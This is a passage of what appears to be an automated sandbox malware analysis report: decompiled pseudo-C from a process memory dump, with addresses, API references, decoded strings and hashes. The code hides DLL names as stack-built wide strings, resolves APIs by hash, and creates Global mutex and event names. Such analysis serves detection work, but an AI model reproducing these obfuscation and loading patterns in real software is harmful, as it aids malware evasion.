				 *((intOrPtr*)(_t55 - 0xc)) = 0x64002e;
				 *((intOrPtr*)(_t55 - 8)) = 0x6c006c;
				 *((intOrPtr*)(_t55 - 0xb0)) = 0x33cc4020;
				 *((intOrPtr*)(_t55 - 0xac)) = 0x9f0daa96;
				 *((intOrPtr*)(_t55 - 0xa8)) = 0x5ca0b0ad;
				 *((intOrPtr*)(_t55 - 0xa4)) = 0x1c96886d;
				 *((intOrPtr*)(_t55 - 0xa0)) = 0xe391654b;
				 *((intOrPtr*)(_t55 - 0x9c)) = 0x6904e160;
				 *((intOrPtr*)(_t55 - 0x98)) = 0x997c2bb6;
				 *((intOrPtr*)(_t55 - 0x94)) = 0x94d35bd5;
				 *((intOrPtr*)(_t55 - 0x90)) = 0xbee2db1f;
				 *((intOrPtr*)(_t55 - 0x8c)) = 0x63d42b4;
				 *((intOrPtr*)(_t55 - 0x88)) = 0x4dfe2e46;
				 *((intOrPtr*)(_t55 - 0x84)) = 0x37177fe4;
				 *((intOrPtr*)(_t55 - 0x80)) = 0xbc69ca64;
				 *((intOrPtr*)(_t55 - 0x7c)) = 0x5ded52fa;
				 *((intOrPtr*)(_t55 - 0x78)) = 0x3bfe6937;
				 *((intOrPtr*)(_t55 - 0x74)) = 0xa27d54c5;
				 *((intOrPtr*)(_t55 - 0x70)) = 0x3b36f17e;
				 *((intOrPtr*)(_t55 - 0x6c)) = 0xa97569b5;
				 *((intOrPtr*)(_t55 - 0x68)) = 0x3d04be79;
				 *((intOrPtr*)(_t55 - 0x64)) = 0x3e86ae46;
				 *((intOrPtr*)(_t55 - 0x60)) = 0x6e587f2a;
				 *((intOrPtr*)(_t55 - 0x5c)) = 0x87244c93;
				 *((intOrPtr*)(_t55 - 0x58)) = 0x72885b33;
				 *((intOrPtr*)(_t55 - 0x54)) = 0x3f8fc85;
				 *((intOrPtr*)(_t55 - 0x50)) = 0xdd1920a8;
				 *((intOrPtr*)(_t55 - 0x4c)) = 0xd730e46d;
				 *((intOrPtr*)(_t55 - 0x48)) = 0xd2f5ba1b;
				 *((intOrPtr*)(_t55 - 0x44)) = 0x1c079652;
				 *((intOrPtr*)(_t55 - 0x40)) = 0x2315069c;
				 *((intOrPtr*)(_t55 - 0x3c)) = 0xe15cc32;
				 *((intOrPtr*)(_t55 - 0x38)) = 0xad9cb11c;
				 *((intOrPtr*)(_t55 - 0x34)) = 0xcd8e55ea;
				 *((intOrPtr*)(_t55 - 0x30)) = 0xe4d3dd96;
				 *((intOrPtr*)(_t55 - 0x2c)) = 0xf2e75668;
				 *((intOrPtr*)(_t55 - 0x28)) = 0x5ce7d387;
				 *((intOrPtr*)(_t55 - 0x24)) = 0x2ccd65a4;
				 *((intOrPtr*)(_t55 - 0x20)) = 0x580ea151;
				 *0x95a850 = LoadLibraryW(_t55 - 0x1c);
				return E00951620(_t51, _t49, _t55 - 0xb0, _t54, 0x25, 0x31dbb1c1, 0x95a5e0);
			}

0x00956c3b
0x00956c42
0x00956c4a
0x00956c51
0x00956c58
0x00956c5f
0x00956c66
0x00956c6d
0x00956c77
0x00956c81
0x00956c8b
0x00956c95
0x00956c9f
0x00956ca9
0x00956cb3
0x00956cbd
0x00956cc7
0x00956cd1
0x00956cdb
0x00956ce5
0x00956cec
0x00956cf3
0x00956cfa
0x00956d01
0x00956d08
0x00956d0f
0x00956d16
0x00956d1d
0x00956d24
0x00956d2b
0x00956d32
0x00956d39
0x00956d40
0x00956d47
0x00956d4e
0x00956d55
0x00956d5c
0x00956d63
0x00956d6a
0x00956d71
0x00956d78
0x00956d7f
0x00956d86
0x00956d8d
0x00956dac
0x00956dbe

APIs

LoadLibraryW.KERNEL32 ref: 00956D94

Strings

v, xrefs: 00956C4A
a, xrefs: 00956C3B
., xrefs: 00956C5F
3, xrefs: 00956C58
l, xrefs: 00956C66
p, xrefs: 00956C51

Memory Dump Source

Source File: 00000000.00000002.372046233.0000000000951000.00000020.00000001.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.372039615.0000000000950000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.372056265.0000000000959000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.372063080.000000000095A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: .$3$a$l$p$v
API String ID: 1029625771-1296750983
Opcode ID: 8a4307aa4c9b63efa7db6dbc33d12e067c2eeca54c64aae2cfa0b6766b1da2f7
Instruction ID: 74d3a6d4453ff6df5f461c175892c0350a194b9364d69b858d413f23e294722e
Opcode Fuzzy Hash: 8a4307aa4c9b63efa7db6dbc33d12e067c2eeca54c64aae2cfa0b6766b1da2f7
Instruction Fuzzy Hash: 3631CAB0D01368DFDB20CF91AA8568DBFB1BB45744F208688D1593B215DB710A86CF96

Uniqueness

Uniqueness Score: -1.00%

Function 00956F89, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 34
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00956F89(WCHAR* __eax) {
				void* _t26;
				void* _t29;
				void* _t30;

				 *((intOrPtr*)(_t30 - 0x18)) = 0x690077;
				 *((intOrPtr*)(_t30 - 0x14)) = 0x69006e;
				 *((intOrPtr*)(_t30 - 0x10)) = 0x65006e;
				 *((intOrPtr*)(_t30 - 0xc)) = 0x2e0074;
				 *((intOrPtr*)(_t30 - 8)) = 0x6c0064;
				 *((intOrPtr*)(_t30 - 4)) = 0x6c;
				 *((intOrPtr*)(_t30 - 0x54)) = 0x7e9cef33;
				 *((intOrPtr*)(_t30 - 0x50)) = 0xdf5dcd1c;
				 *((intOrPtr*)(_t30 - 0x4c)) = 0xf76ea847;
				 *((intOrPtr*)(_t30 - 0x48)) = 0x210615a6;
				 *((intOrPtr*)(_t30 - 0x44)) = 0xf85bec06;
				 *((intOrPtr*)(_t30 - 0x40)) = 0x210615cc;
				 *((intOrPtr*)(_t30 - 0x3c)) = 0xb415740e;
				 *((intOrPtr*)(_t30 - 0x38)) = 0xf14719d1;
				 *((intOrPtr*)(_t30 - 0x34)) = 0xc68243e2;
				 *((intOrPtr*)(_t30 - 0x30)) = 0x2e7786e5;
				 *((intOrPtr*)(_t30 - 0x2c)) = 0x17af1f7c;
				 *((intOrPtr*)(_t30 - 0x28)) = 0x704a2194;
				 *((intOrPtr*)(_t30 - 0x24)) = 0xa5de13b2;
				 *((intOrPtr*)(_t30 - 0x20)) = 0x5f2aa102;
				 *((intOrPtr*)(_t30 - 0x1c)) = 0xcebb686;
				 *0x95a864 = LoadLibraryW(__eax);
				return E00951620(_t26, _t24, _t30 - 0x54, _t29, 0xf, 0x7b12011d, 0x95a7e0);
			}

0x00956f89
0x00956f91
0x00956f98
0x00956f9f
0x00956fa6
0x00956fad
0x00956fb4
0x00956fbb
0x00956fc2
0x00956fc9
0x00956fd0
0x00956fd7
0x00956fde
0x00956fe5
0x00956fec
0x00956ff3
0x00956ffa
0x00957001
0x00957008
0x0095700f
0x00957016
0x00957032
0x00957044

APIs

LoadLibraryW.KERNEL32 ref: 0095701D

Strings

w, xrefs: 00956F89
n, xrefs: 00956F98
n, xrefs: 00956F91
t, xrefs: 00956F9F
l, xrefs: 00956FAD
d, xrefs: 00956FA6

Memory Dump Source

Source File: 00000000.00000002.372046233.0000000000951000.00000020.00000001.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.372039615.0000000000950000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.372056265.0000000000959000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.372063080.000000000095A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: d$l$n$n$t$w
API String ID: 1029625771-683715976
Opcode ID: cc1e3d99ff8af36d06b5bbb8fecb58c59c78dd90613f0e20486f19d2772c80f8
Instruction ID: 2cf7d10baaff751711a945b90eb90999887abac838e2a5d81bf0d1db829454dd
Opcode Fuzzy Hash: cc1e3d99ff8af36d06b5bbb8fecb58c59c78dd90613f0e20486f19d2772c80f8
Instruction Fuzzy Hash: 6F11CEB0D12359EFDF10CF91D9896DCBFB1BB44304F248208E6517A214D3B50A8ACF59

Uniqueness

Uniqueness Score: -1.00%

Function 0095726A, Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E0095726A(void* __eax) {
				void* _t19;
				void* _t23;

				 *((intOrPtr*)(_t23 - 0x18)) = 0x6c0047;
				 *((short*)(_t23 - 4)) = 0;
				 *((intOrPtr*)(_t23 - 0x14)) = 0x62006f;
				 *((intOrPtr*)(_t23 - 0x10)) = 0x6c0061;
				 *((intOrPtr*)(_t23 - 0xc)) = 0x45005c;
				 *((intOrPtr*)(_t23 - 8)) = 0x580025;
				 *0x95a7cc(_t23 - 0x98, 0x40, _t23 - 0x18);
				_t19 = CreateEventW(0, 0, 0, _t23 - 0x98);
				 *0x95a82c = _t19;
				return 0 | _t19 != 0x00000000;
			}

0x00957271
0x00957278
0x00957286
0x00957290
0x00957297
0x0095729e
0x009572a5
0x009572bb
0x009572c3
0x009572d2

APIs

_snwprintf.NTDLL ref: 009572A5
CreateEventW.KERNEL32(00000000,00000000,00000000,?), ref: 009572BB

Strings

G, xrefs: 00957271
%, xrefs: 0095729E
o, xrefs: 00957286
a, xrefs: 00957290
\, xrefs: 00957297

Memory Dump Source

Source File: 00000000.00000002.372046233.0000000000951000.00000020.00000001.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.372039615.0000000000950000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.372056265.0000000000959000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.372063080.000000000095A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: CreateEvent_snwprintf
String ID: %$G$\$a$o
API String ID: 3138640819-4186019298
Opcode ID: a191fd4cdf404e041ac3a1376cb56ceb843ef2dfcb265e8de5848867c5577ced
Instruction ID: 56c98388d5fc24cf9d0767ea9b6381ba3592a08a6caca3858e2b8ee4e46afb03
Opcode Fuzzy Hash: a191fd4cdf404e041ac3a1376cb56ceb843ef2dfcb265e8de5848867c5577ced
Instruction Fuzzy Hash: 8EF054B0A14309DBDB50CFA59C05BED7BF8EF08705F00415AEA0CE6281D77196888F9D

Uniqueness

Uniqueness Score: -1.00%

Function 009571EA, Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 28
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E009571EA(void* __eax) {
				void* _t19;
				void* _t23;

				 *((intOrPtr*)(_t23 - 0x18)) = 0x6c0047;
				 *((short*)(_t23 - 4)) = 0;
				 *((intOrPtr*)(_t23 - 0x14)) = 0x62006f;
				 *((intOrPtr*)(_t23 - 0x10)) = 0x6c0061;
				 *((intOrPtr*)(_t23 - 0xc)) = 0x4d005c;
				 *((intOrPtr*)(_t23 - 8)) = 0x580025;
				 *0x95a7cc(_t23 - 0x98, 0x40, _t23 - 0x18);
				_t19 = CreateMutexW(0, 0, _t23 - 0x98);
				 *0x95a828 = _t19;
				return 0 | _t19 != 0x00000000;
			}

0x009571f1
0x009571f8
0x00957206
0x00957210
0x00957217
0x0095721e
0x00957225
0x00957239
0x00957241
0x00957250

APIs

_snwprintf.NTDLL ref: 00957225
CreateMutexW.KERNEL32(00000000,00000000,?), ref: 00957239

Strings

o, xrefs: 00957206
\, xrefs: 00957217
a, xrefs: 00957210
%, xrefs: 0095721E
G, xrefs: 009571F1

Memory Dump Source

Source File: 00000000.00000002.372046233.0000000000951000.00000020.00000001.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.372039615.0000000000950000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.372056265.0000000000959000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.372063080.000000000095A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: CreateMutex_snwprintf
String ID: %$G$\$a$o
API String ID: 451050361-4186019298
Opcode ID: 34021aea3da0dc7ce7a177df6bd5c9dc22c01f482e4f79888df8d7639420dc3b
Instruction ID: c33019ae945e950e5016eee506643861193b8f35084688c26b017b63a4f85301
Opcode Fuzzy Hash: 34021aea3da0dc7ce7a177df6bd5c9dc22c01f482e4f79888df8d7639420dc3b
Instruction Fuzzy Hash: 72F054B0914309DBDB50CF959C49BED7FF8EF04705F00419AAA0CE6241D77186888F99

Uniqueness

Uniqueness Score: -1.00%

Function 0095716A, Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 28
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E0095716A(void* __eax) {
				void* _t19;
				void* _t23;

				 *((intOrPtr*)(_t23 - 0x18)) = 0x6c0047;
				 *((short*)(_t23 - 4)) = 0;
				 *((intOrPtr*)(_t23 - 0x14)) = 0x62006f;
				 *((intOrPtr*)(_t23 - 0x10)) = 0x6c0061;
				 *((intOrPtr*)(_t23 - 0xc)) = 0x49005c;
				 *((intOrPtr*)(_t23 - 8)) = 0x580025;
				 *0x95a7cc(_t23 - 0x98, 0x40, _t23 - 0x18);
				_t19 = CreateMutexW(0, 0, _t23 - 0x98);
				 *0x95a834 = _t19;
				return 0 | _t19 != 0x00000000;
			}

0x00957171
0x00957178
0x00957186
0x00957190
0x00957197
0x0095719e
0x009571a5
0x009571b9
0x009571c1
0x009571d0

APIs

_snwprintf.NTDLL ref: 009571A5
CreateMutexW.KERNEL32(00000000,00000000,?), ref: 009571B9

Strings

%, xrefs: 0095719E
G, xrefs: 00957171
\, xrefs: 00957197
a, xrefs: 00957190
o, xrefs: 00957186

Memory Dump Source

Source File: 00000000.00000002.372046233.0000000000951000.00000020.00000001.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.372039615.0000000000950000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.372056265.0000000000959000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.372063080.000000000095A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: CreateMutex_snwprintf
String ID: %$G$\$a$o
API String ID: 451050361-4186019298
Opcode ID: 0cb973a82f7f9ceb7691541b08f502617c505a701a43c67ef4b6e87f9db4c18d
Instruction ID: e0548a5bb14f9ddc64d46b7bdaaf02048361875feb97faafe06d2eaf1e27b313
Opcode Fuzzy Hash: 0cb973a82f7f9ceb7691541b08f502617c505a701a43c67ef4b6e87f9db4c18d
Instruction Fuzzy Hash: 87F05EB0A15309DBDB50CFA59C45BEE7FF8EF04706F00419AEA0CE6241D77186888F99

Uniqueness

Uniqueness Score: -1.00%

Function 00957058, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 24
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00957058(short __eax) {
				void* _t17;
				void* _t20;
				void* _t21;

				 *(_t21 - 0x28) = 0x740077;
				 *((short*)(_t21 - 0x10)) = __eax;
				 *((intOrPtr*)(_t21 - 0x24)) = 0x610073;
				 *((intOrPtr*)(_t21 - 0x20)) = 0x690070;
				 *((intOrPtr*)(_t21 - 0x1c)) = 0x320033;
				 *((intOrPtr*)(_t21 - 0x18)) = 0x64002e;
				 *((intOrPtr*)(_t21 - 0x14)) = 0x6c006c;
				 *((intOrPtr*)(_t21 - 0xc)) = 0xe1944b6c;
				 *((intOrPtr*)(_t21 - 8)) = 0xb934f523;
				 *((intOrPtr*)(_t21 - 4)) = 0x5f0c0bb3;
				 *0x95a868 = LoadLibraryW(_t21 - 0x28);
				return E00951620(_t17, _t15, _t21 - 0xc, _t20, 3, 0x4844c8f, 0x95a81c);
			}

0x00957058
0x0095705f
0x00957067
0x0095706e
0x00957075
0x0095707c
0x00957083
0x0095708a
0x00957091
0x00957098
0x009570b4
0x009570c6

APIs

LoadLibraryW.KERNEL32(00740077), ref: 0095709F

Strings

l, xrefs: 00957083
p, xrefs: 0095706E
., xrefs: 0095707C
w, xrefs: 00957058
3, xrefs: 00957075
s, xrefs: 00957067

Memory Dump Source

Source File: 00000000.00000002.372046233.0000000000951000.00000020.00000001.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.372039615.0000000000950000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.372056265.0000000000959000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.372063080.000000000095A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: .$3$l$p$s$w
API String ID: 1029625771-4241247243
Opcode ID: fe3e23ecb2e40d894d8c6fc0131e7dc0ffa29a24edd310be39d48a5563373747
Instruction ID: f729200ce77f0a1e4855ae4d7de35ea8657b2133e9488d858e0d4639b1ee292d
Opcode Fuzzy Hash: fe3e23ecb2e40d894d8c6fc0131e7dc0ffa29a24edd310be39d48a5563373747
Instruction Fuzzy Hash: 4EF0F4B4D05308DBDF01CF91A8497EDBFB5AB54B09F144259D504BB210D3BA0648CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 00956DC9, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 21
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00956DC9(WCHAR* __eax) {
				void* _t13;
				void* _t16;
				void* _t17;

				 *((intOrPtr*)(_t17 - 0x20)) = 0x680073;
				 *((intOrPtr*)(_t17 - 0x1c)) = 0x6c0065;
				 *((intOrPtr*)(_t17 - 0x18)) = 0x33006c;
				 *((intOrPtr*)(_t17 - 0x14)) = 0x2e0032;
				 *((intOrPtr*)(_t17 - 0x10)) = 0x6c0064;
				 *((intOrPtr*)(_t17 - 0xc)) = 0x6c;
				 *((intOrPtr*)(_t17 - 8)) = 0x4377f0;
				 *((intOrPtr*)(_t17 - 4)) = 0x327f34b2;
				 *0x95a854 = LoadLibraryW(__eax);
				return E00951620(_t13, _t11, _t17 - 8, _t16, 2, 0x1df027f1, 0x95a678);
			}

0x00956dc9
0x00956dd1
0x00956dd8
0x00956ddf
0x00956de6
0x00956ded
0x00956df4
0x00956dfb
0x00956e17
0x00956e29

APIs

LoadLibraryW.KERNEL32 ref: 00956E02

Strings

e, xrefs: 00956DD1
d, xrefs: 00956DE6
2, xrefs: 00956DDF
l, xrefs: 00956DD8
l, xrefs: 00956DED
s, xrefs: 00956DC9

Memory Dump Source

Source File: 00000000.00000002.372046233.0000000000951000.00000020.00000001.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.372039615.0000000000950000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.372056265.0000000000959000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.372063080.000000000095A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: 2$d$e$l$l$s
API String ID: 1029625771-1854679484
Opcode ID: 2c93f2d881637c7190bf6bb55335ef3477647139c4e2d1dc8c40950fbfda50c9
Instruction ID: 76fb45f6760715beef0aea3bf75c45a4b136e096aa3ef92ef22fb140b6a67762
Opcode Fuzzy Hash: 2c93f2d881637c7190bf6bb55335ef3477647139c4e2d1dc8c40950fbfda50c9
Instruction Fuzzy Hash: 7EF01CB0D46308EADB00CF9199497ADBFB2EB44709F00824899046A201D7BA06488F99

Uniqueness

Uniqueness Score: -1.00%

Function 00956F19, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 21
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00956F19(WCHAR* __eax) {
				void* _t13;
				void* _t16;
				void* _t17;

				 *((intOrPtr*)(_t17 - 0x20)) = 0x730075;
				 *((intOrPtr*)(_t17 - 0x1c)) = 0x720065;
				 *((intOrPtr*)(_t17 - 0x18)) = 0x6e0065;
				 *((intOrPtr*)(_t17 - 0x14)) = 0x2e0076;
				 *((intOrPtr*)(_t17 - 0x10)) = 0x6c0064;
				 *((intOrPtr*)(_t17 - 0xc)) = 0x6c;
				 *((intOrPtr*)(_t17 - 8)) = 0x4e606efb;
				 *((intOrPtr*)(_t17 - 4)) = 0x7ab57c39;
				 *0x95a860 = LoadLibraryW(__eax);
				return E00951620(_t13, _t11, _t17 - 8, _t16, 2, 0x3040902d, 0x95a7d8);
			}

0x00956f19
0x00956f21
0x00956f28
0x00956f2f
0x00956f36
0x00956f3d
0x00956f44
0x00956f4b
0x00956f67
0x00956f79

APIs

LoadLibraryW.KERNEL32 ref: 00956F52

Strings

l, xrefs: 00956F3D
d, xrefs: 00956F36
e, xrefs: 00956F28
e, xrefs: 00956F21
u, xrefs: 00956F19
v, xrefs: 00956F2F

Memory Dump Source

Source File: 00000000.00000002.372046233.0000000000951000.00000020.00000001.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.372039615.0000000000950000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.372056265.0000000000959000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.372063080.000000000095A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: d$e$e$l$u$v
API String ID: 1029625771-2321630952
Opcode ID: a917df7641b84f6f11cbfbbeda994913c367476640ffa9cd1f5dfb711d23c608
Instruction ID: d992ab9f1368c191f5620bffc4b5b636d76696002ca636872a480cff0ce85c0f
Opcode Fuzzy Hash: a917df7641b84f6f11cbfbbeda994913c367476640ffa9cd1f5dfb711d23c608
Instruction Fuzzy Hash: 08F039B0D41309EFDB00CF92E84D7ADBFB2EB4470AF048658D5057B640D7BA06889FA5

Uniqueness

Uniqueness Score: -1.00%

Function 00956E39, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 20
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00956E39(WCHAR* __eax) {
				void* _t12;
				void* _t15;
				void* _t16;

				 *((intOrPtr*)(_t16 - 0x1c)) = 0x720063;
				 *((intOrPtr*)(_t16 - 0x18)) = 0x700079;
				 *((intOrPtr*)(_t16 - 0x14)) = 0x330074;
				 *((intOrPtr*)(_t16 - 0x10)) = 0x2e0032;
				 *((intOrPtr*)(_t16 - 0xc)) = 0x6c0064;
				 *((intOrPtr*)(_t16 - 8)) = 0x6c;
				 *((intOrPtr*)(_t16 - 4)) = 0x921bd614;
				 *0x95a858 = LoadLibraryW(__eax);
				return E00951620(_t12, _t10, _t16 - 4, _t15, 1, 0x7767dfda, 0x95a674);
			}

0x00956e39
0x00956e41
0x00956e48
0x00956e4f
0x00956e56
0x00956e5d
0x00956e64
0x00956e80
0x00956e92

APIs

LoadLibraryW.KERNEL32 ref: 00956E6B

Strings

y, xrefs: 00956E41
t, xrefs: 00956E48
d, xrefs: 00956E56
c, xrefs: 00956E39
l, xrefs: 00956E5D
2, xrefs: 00956E4F

Memory Dump Source

Source File: 00000000.00000002.372046233.0000000000951000.00000020.00000001.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.372039615.0000000000950000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.372056265.0000000000959000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.372063080.000000000095A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: 2$c$d$l$t$y
API String ID: 1029625771-1585075223
Opcode ID: c8d8ed8b6ab247d7e03344d16ffa3ad53998db121692999191b5a98ef9560149
Instruction ID: 7bb5acc987a7fa25c5112f81e2817bd166111996ffb644d11dd14482ff83b433
Opcode Fuzzy Hash: c8d8ed8b6ab247d7e03344d16ffa3ad53998db121692999191b5a98ef9560149
Instruction Fuzzy Hash: A6E039B0D41309EEDF00CF92A9497ACBBB1EB50709F104258DA086A240D3BA07588FD5

Uniqueness

Uniqueness Score: -1.00%

Function 00956EA8, Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 21
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00956EA8(short __eax) {
				void* _t14;
				void* _t17;
				void* _t18;

				 *(_t18 - 0x1c) = 0x720075;
				 *((short*)(_t18 - 8)) = __eax;
				 *((intOrPtr*)(_t18 - 0x18)) = 0x6d006c;
				 *((intOrPtr*)(_t18 - 0x14)) = 0x6e006f;
				 *((intOrPtr*)(_t18 - 0x10)) = 0x64002e;
				 *((intOrPtr*)(_t18 - 0xc)) = 0x6c006c;
				 *((intOrPtr*)(_t18 - 4)) = 0x925edb63;
				 *0x95a85c = LoadLibraryW(_t18 - 0x1c);
				return E00951620(_t14, _t12, _t18 - 4, _t17, 1, 0xe7f4d45, 0x95a7d4);
			}

0x00956ea8
0x00956eaf
0x00956eb7
0x00956ebe
0x00956ec5
0x00956ecc
0x00956ed3
0x00956eef
0x00956f01

APIs

LoadLibraryW.KERNEL32(00720075), ref: 00956EDA

Strings

o, xrefs: 00956EBE
l, xrefs: 00956ECC
., xrefs: 00956EC5
l, xrefs: 00956EB7
u, xrefs: 00956EA8

Memory Dump Source

Source File: 00000000.00000002.372046233.0000000000951000.00000020.00000001.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.372039615.0000000000950000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.372056265.0000000000959000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.372063080.000000000095A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: .$l$l$o$u
API String ID: 1029625771-3769830063
Opcode ID: fc9c3dac8aad1070557de490b0fb93fa22111a8dcb08fc1cb56eca0cb0454f5e
Instruction ID: 36fed6e9f7b7c7e0d2dc0069f4b520ea0524c1ff929e164fdd70c79c2e409a56
Opcode Fuzzy Hash: fc9c3dac8aad1070557de490b0fb93fa22111a8dcb08fc1cb56eca0cb0454f5e
Instruction Fuzzy Hash: A4F0C0B0D51309EFDB00DFD198496EDBFB6EB44705F104159D6146B310E7B606889F95

Uniqueness

Uniqueness Score: -1.00%

Function 00957DC4, Relevance: 9.0, APIs: 6, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E00957DC4() {
				int _t3;
				void* _t7;
				void* _t9;
				void* _t11;

				_t7 = MapViewOfFile();
				if(_t7 != 0) {
					 *0x95a838 = RtlComputeCrc32(0, _t7, GetFileSize(_t11, 0));
					UnmapViewOfFile(_t7);
				}
				CloseHandle(_t9);
				_t3 = CloseHandle(_t11);
				return _t3;
			}

0x00957dca
0x00957dce
0x00957de4
0x00957de9
0x00957de9
0x00957df0
0x00957df8
0x00957e00

APIs

MapViewOfFile.KERNEL32 ref: 00957DC4
GetFileSize.KERNEL32(?,00000000), ref: 00957DD3
RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 00957DDD
UnmapViewOfFile.KERNEL32(00000000,?,00000000), ref: 00957DE9
CloseHandle.KERNEL32 ref: 00957DF0
CloseHandle.KERNEL32 ref: 00957DF8

Memory Dump Source

Source File: 00000000.00000002.372046233.0000000000951000.00000020.00000001.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.372039615.0000000000950000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.372056265.0000000000959000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.372063080.000000000095A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_tcpmdmaus.jbxd

Yara matches

Similarity

API ID: File$CloseHandleView$ComputeCrc32SizeUnmap
String ID:
API String ID: 741204879-0
Opcode ID: 23ca89931979af46cfc258acf52cb7216b2a2f8b5652da21638adc8eb0869ca0
Instruction ID: 11264457d7e32bc19d440263b06a43392baf25154af8fb037b54951d507c0184
Opcode Fuzzy Hash: 23ca89931979af46cfc258acf52cb7216b2a2f8b5652da21638adc8eb0869ca0
Instruction Fuzzy Hash: B2E0ECB262D301AFD3011BE7BC9CB6A7B7CEB4C613F044215F601C1060CB784806AB6B

Uniqueness

Uniqueness Score: -1.00%

Function 00957D07, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00957D07(void* __eax, void* __ebx, intOrPtr __ecx) {
				void* __esi;
				intOrPtr _t18;
				void* _t21;
				void* _t24;

				_t18 = __ecx;
				_t1 = __ecx + 0x65;
				 *_t1 =  *((intOrPtr*)(__ecx + 0x65)) + __ebx;
				 *((intOrPtr*)(_t24 - 0x14)) = 0x730025;
				 *((intOrPtr*)(_t24 - 0x10)) = 0x25005c;
				 *((intOrPtr*)(_t24 - 0xc)) = 0x2e0073;
				 *((intOrPtr*)(_t24 - 8)) = 0x780065;
				 *((intOrPtr*)(_t24 - 4)) = __ecx;
				if( *_t1 == 0) {
					L00957C70(__eax);
				} else {
					L00957C50();
				}
				L00957BD0(L00951BA0(_t18, _t21));
				L00951BF0(_t11);
				return  *0x95a7cc(0x95aab0, 0x104, _t24 - 0x14, 0x95adc0, 0x95a8a0, _t18, _t21);
			}

0x00957d07
0x00957d0c
0x00957d0c
0x00957d12
0x00957d19
0x00957d20
0x00957d27
0x00957d2e
0x00957d31
0x00957d3a
0x00957d33
0x00957d33
0x00957d33
0x00957d4a
